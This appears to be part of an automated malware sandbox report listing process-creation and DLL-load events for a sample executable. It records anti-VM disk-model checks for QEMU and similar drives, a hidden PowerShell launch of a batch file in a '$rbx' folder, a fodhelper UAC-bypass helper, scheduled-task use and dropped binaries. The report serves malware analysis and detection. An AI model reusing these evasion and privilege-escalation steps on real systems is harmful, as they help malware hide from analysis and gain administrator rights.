        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
        Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: amsi.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: edputil.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: appresolver.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: bcp47langs.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: slc.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
        Source: C:\Users\user\AppData\Local\Temp\paint.exe Section loaded: apphelp.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: ieframe.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: netapi32.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: version.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: wkscli.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: mlang.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: wininet.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: policymanager.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: mrmcorer.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositorycore.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.ui.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: windowmanagementapi.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: textinputframework.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: inputhost.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\fodhelper.exe Section loaded: bcp47mrm.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
        Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Section loaded: apphelp.dll
        Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exe Section loaded: userenv.dll
        Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
        Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
        Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
        Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
        Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
        Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
        Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
        Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
        Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
        Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
        Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
        Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
        Source: C:\Windows\explorer.exe Section loaded: wldp.dll
        Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
        Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
        Source: C:\Windows\explorer.exe Section loaded: pdh.dll
        Source: C:\Windows\explorer.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
